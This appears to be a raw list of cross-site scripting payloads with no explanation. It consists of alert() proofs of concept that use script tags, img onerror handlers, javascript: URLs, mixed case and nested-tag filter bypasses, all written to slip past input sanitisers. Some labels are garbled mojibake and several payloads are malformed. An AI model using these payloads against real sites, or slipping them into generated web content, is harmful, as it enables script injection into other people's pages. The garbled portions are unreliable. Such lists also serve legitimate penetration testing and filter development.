<script>alert(1)</script>  
<script>alert(2)</script>
medium--> Ë«Ð´ÈÆ¹ý£º<sc<script>ript>alert(4)</script>
	    ´óÐ¡Ð´»ìÏýÈÆ¹ý£º<ScRipt>alert(5)</script>
	<img src=1 onerror=alert(7)>
onmouseover=¡¯alert(9)¡¯
<script>alert(11);</script> 
>"'><img src="javascript.:alert(12)">
>"'><script>alert(13)</script>
<table background='javascript.:alert(14)'></table>
<object type=text/html data='javascript.:alert(15);'></object>
"+alert(16)+"
<body/onfocus=top.alert(17)>
<img/src=22 onerror=window.alert(22)>
<img src=62 onerror=(function(){alert(62)})()>
<img src=63 onerror=!function(){alert(63)}()>
<img src=64 onerror=%2bfunction(){alert(64)}()>
<img src=65 onerror=%2dfunction(){alert(65)}()>
<img src=66 onerror=~function(){alert(66)}()>
<a href="javascript:`${alert(69)}`">XSS Test</a>
<a href="javascript:[''].findIndex(alert(71)">X